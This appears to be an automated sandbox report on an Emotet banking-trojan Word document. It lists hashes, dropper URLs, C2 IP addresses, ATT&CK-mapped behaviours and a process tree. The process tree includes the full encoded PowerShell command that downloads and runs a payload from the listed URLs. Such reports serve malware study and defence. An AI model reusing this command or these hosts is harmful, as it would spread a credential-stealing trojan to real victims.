emotet | 2bbb79dcbacd77c823570a51bff214c9a7f283b88d1b0f9a993c44a92a7e3ee5

General

Target

2bbb79dcbacd77c823570a51bff214c9a7f283b88d1b0f9a993c44a92a7e3ee5
Sample

200118-lr82fgamax
SHA256

2bbb79dcbacd77c823570a51bff214c9a7f283b88d1b0f9a993c44a92a7e3ee5

Score

10^/10

trojan banker emotet

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

http://www.bluedream.al/calendar/r83g9/

exe.dropper

http://myphamthanhbinh.net/wp-content/uploads/qDq/

exe.dropper

http://sfmac.biz/calendar/K1a/

exe.dropper

https://www.cometprint.net/cgi-bin/q/

exe.dropper

http://www.mjmechanical.com/wp-includes/ddy/

Extracted

Family

emotet

C2

100.6.23.40:80

200.71.200.4:443

190.114.244.182:443

91.250.96.22:8080

37.187.72.193:8080

104.131.44.150:8080

167.71.10.37:8080

110.36.217.66:8080

206.81.10.215:8080

93.147.141.5:443

60.250.78.22:443

92.222.216.44:8080

95.213.236.64:8080

27.109.153.201:8090

66.7.242.50:8080

5.196.74.210:8080

181.143.126.170:80

209.97.168.52:8080

206.189.112.148:8080

64.53.242.181:8080

rsa_pubkey.plain

Signatures

Suspicious use of SetWindowsHookEx 5 IoCs

Processes:

WINWORD.EXE906.exe906.exeattribhant.exeattribhant.exe

pid process

4848 WINWORD.EXE
4576 906.exe
4500 906.exe
4588 attribhant.exe
3836 attribhant.exe

pid	process
4848	WINWORD.EXE
4576	906.exe
4500	906.exe
4588	attribhant.exe
3836	attribhant.exe

Process spawned unexpected child process 1 IoCs

Processes:

Powershell.exe

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4300	5116	Powershell.exe

Suspicious use of WriteProcessMemory 3 IoCs

Processes:

Powershell.exe906.exeattribhant.exe

description	pid	process	target process
PID 4300 wrote to memory of 4576	4300	Powershell.exe	906.exe
PID 4576 wrote to memory of 4500	4576	906.exe	906.exe
PID 4588 wrote to memory of 3836	4588	attribhant.exe	attribhant.exe

Executes dropped EXE 4 IoCs

Processes:

906.exe906.exeattribhant.exeattribhant.exe

pid process

4576 906.exe
4500 906.exe
4588 attribhant.exe
3836 attribhant.exe
Emotet
Emotet is a trojan that is primarily spread through spam emails
trojan banker emotet
Drops file in System32 directory 1 IoCs

Processes:

906.exe

description ioc process

File renamed C:\Users\Admin\906.exe => C:\Windows\SysWOW64\attribhant.exe 906.exe
Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

WINWORD.EXE

pid process

4848 WINWORD.EXE
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

Powershell.exe

description pid process

Token: SeDebugPrivilege 4300 Powershell.exe
Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

Powershell.exe

pid process

4300 Powershell.exe
Suspicious behavior: EmotetMutantsSpam 2 IoCs

Processes:

906.exeattribhant.exe

pid process

4500 906.exe
3836 attribhant.exe

pid	process
4576	906.exe
4500	906.exe
4588	attribhant.exe
3836	attribhant.exe

description	ioc	process
File renamed	C:\Users\Admin\906.exe => C:\Windows\SysWOW64\attribhant.exe	906.exe

pid	process
4848	WINWORD.EXE

description	pid	process
Token: SeDebugPrivilege	4300	Powershell.exe

pid	process
4300	Powershell.exe

pid	process
4500	906.exe
3836	attribhant.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\2bbb79dcbacd77c823570a51bff214c9a7f283b88d1b0f9a993c44a92a7e3ee5.doc" /o ""
1⤵
- Suspicious use of SetWindowsHookEx
- Suspicious behavior: AddClipboardFormatListener
- Checks processor information in registry
- Enumerates system info in registry
PID:4848

C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
Powershell -w hidden -en JABOAGEAaAB4AGIAegB4AG0AbgBzAG0AYgA9ACcARwBiAG0AZABuAG0AZwBoAG4AJwA7ACQAUQBzAGgAaAB0AGwAbgBpAG0AYQBjACAAPQAgACcAOQAwADYAJwA7ACQASgBsAGwAeABpAHkAcwB2AGgAcAA9ACcAUwBiAHAAYgBkAGEAdgBmAHoAZgBnAGgAJwA7ACQASgBhAGUAcAB1AHAAbwByAHUAYgA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAUQBzAGgAaAB0AGwAbgBpAG0AYQBjACsAJwAuAGUAeABlACcAOwAkAFAAegBuAGYAbQBqAGMAbwBxAGwAYgBwAGsAPQAnAFkAeAByAHUAcwBsAGwAdwBmAGQAJwA7ACQAVgBvAGQAbABqAHgAcgB6AHEAbQBuAGwAPQAmACgAJwBuAGUAdwAnACsAJwAtACcAKwAnAG8AYgBqACcAKwAnAGUAYwB0ACcAKQAgAE4ARQB0AC4AdwBlAEIAQwBsAEkARQBOAFQAOwAkAEEAaQB1AHcAZwB4AGMAbgBnAGoAPQAnAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBiAGwAdQBlAGQAcgBlAGEAbQAuAGEAbAAvAGMAYQBsAGUAbgBkAGEAcgAvAHIAOAAzAGcAOQAvACoAaAB0AHQAcAA6AC8ALwBtAHkAcABoAGEAbQB0AGgAYQBuAGgAYgBpAG4AaAAuAG4AZQB0AC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAHUAcABsAG8AYQBkAHMALwBxAEQAcQAvACoAaAB0AHQAcAA6AC8ALwBzAGYAbQBhAGMALgBiAGkAegAvAGMAYQBsAGUAbgBkAGEAcgAvAEsAMQBhAC8AKgBoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBjAG8AbQBlAHQAcAByAGkAbgB0AC4AbgBlAHQALwBjAGcAaQAtAGIAaQBuAC8AcQAvACoAaAB0AHQAcAA6AC8ALwB3AHcAdwAuAG0AagBtAGUAYwBoAGEAbgBpAGMAYQBsAC4AYwBvAG0ALwB3AHAALQBpAG4AYwBsAHUAZABlAHMALwBkAGQAeQAvACcALgAiAFMAYABQAEwASQBUACIAKAAnACoAJwApADsAJABQAG4AZABmAGUAeABsAGkAPQAnAEMAZAB4AHIAZQBsAGUAYQBvACcAOwBmAG8AcgBlAGEAYwBoACgAJABQAGUAeQBvAGEAdQB5AGcAZgBjAGcAdQB6ACAAaQBuACAAJABBAGkAdQB3AGcAeABjAG4AZwBqACkAewB0AHIAeQB7ACQAVgBvAGQAbABqAHgAcgB6AHEAbQBuAGwALgAiAEQATwBgAFcATgBMAG8AYQBEAEYAYABpAGwARQAiACgAJABQAGUAeQBvAGEAdQB5AGcAZgBjAGcAdQB6ACwAIAAkAEoAYQBlAHAAdQBwAG8AcgB1AGIAKQA7ACQAVwBiAGgAcABtAGgAbABlAGMAPQAnAFoAaABuAGIAbQBnAHcAcgAnADsASQBmACAAKAAoACYAKAAnAEcAZQAnACsAJwB0AC0ASQB0ACcAKwAnAGUAbQAnACkAIAAkAEoAYQBlAHAAdQBwAG8AcgB1AGIAKQAuACIAbABgAEUATgBnAHQASAAiACAALQBnAGUAIAAzADkAMQA0ADMAKQAgAHsAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6ACIAcwBUAEEAYABSAFQAIgAoACQASgBhAGUAcAB1AHAAbwByAHUAYgApADsAJABQAHYAbgB4AGEAZwBhAHMAZQBwAHgAPQAnAEwAdgBwAHIAcQB6AGQAcQBhAGEAZQBwACcAOwBiAHIAZQBhAGsAOwAkAFkAeQBkAHcAcQB6AGcAbAA9ACcAUABnAGYAZABqAGQAbABiACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFAAcgBxAGYAYQB6AGMAeQBwAHYAagBoAD0AJwBDAHUAYgB0AGgAdwBtAGEAJwA=
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:4300
- C:\Users\Admin\906.exe
  "C:\Users\Admin\906.exe"
  2⤵
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  - Executes dropped EXE
  PID:4576
- - C:\Users\Admin\906.exe
    --3772ec1d
    3⤵
    - Suspicious use of SetWindowsHookEx
    - Executes dropped EXE
    - Drops file in System32 directory
    - Suspicious behavior: EmotetMutantsSpam
    PID:4500

C:\Windows\SysWOW64\attribhant.exe
"C:\Windows\SysWOW64\attribhant.exe"
1⤵
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
- Executes dropped EXE
PID:4588
- C:\Windows\SysWOW64\attribhant.exe
  --b4a20e9b
  2⤵
  - Suspicious use of SetWindowsHookEx
  - Executes dropped EXE
  - Suspicious behavior: EmotetMutantsSpam
  PID:3836

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Microsoft\Crypto\RSA\S-1-5-18\403f0cc78adafaecdb503a6c6424923d_293fa5bd-edfb-4bba-800e-a7dce3ea3438

Download Submit
C:\Users\Admin\906.exe

Download Submit
C:\Users\Admin\906.exe

Download Submit
C:\Users\Admin\906.exe

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-634046074-2673730973-2644684987-1000\0f5007522459c86e95ffcc62f32308f1_293fa5bd-edfb-4bba-800e-a7dce3ea3438

Download Submit
C:\Windows\SysWOW64\attribhant.exe

Download Submit
C:\Windows\SysWOW64\attribhant.exe

Download Submit
memory/3836-15-0x0000000000DD0000-0x0000000000DE7000-memory.dmp

Filesize
92KB

Download
memory/3836-16-0x0000000000400000-0x000000000045A000-memory.dmp

Filesize
360KB

Download
memory/4500-10-0x0000000000400000-0x000000000045A000-memory.dmp

Filesize
360KB

Download
memory/4500-9-0x0000000002010000-0x0000000002027000-memory.dmp

Filesize
92KB

Download
memory/4576-6-0x00000000006D0000-0x00000000006E7000-memory.dmp

Filesize
92KB

Download
memory/4588-12-0x0000000000DE0000-0x0000000000DF7000-memory.dmp

Filesize
92KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads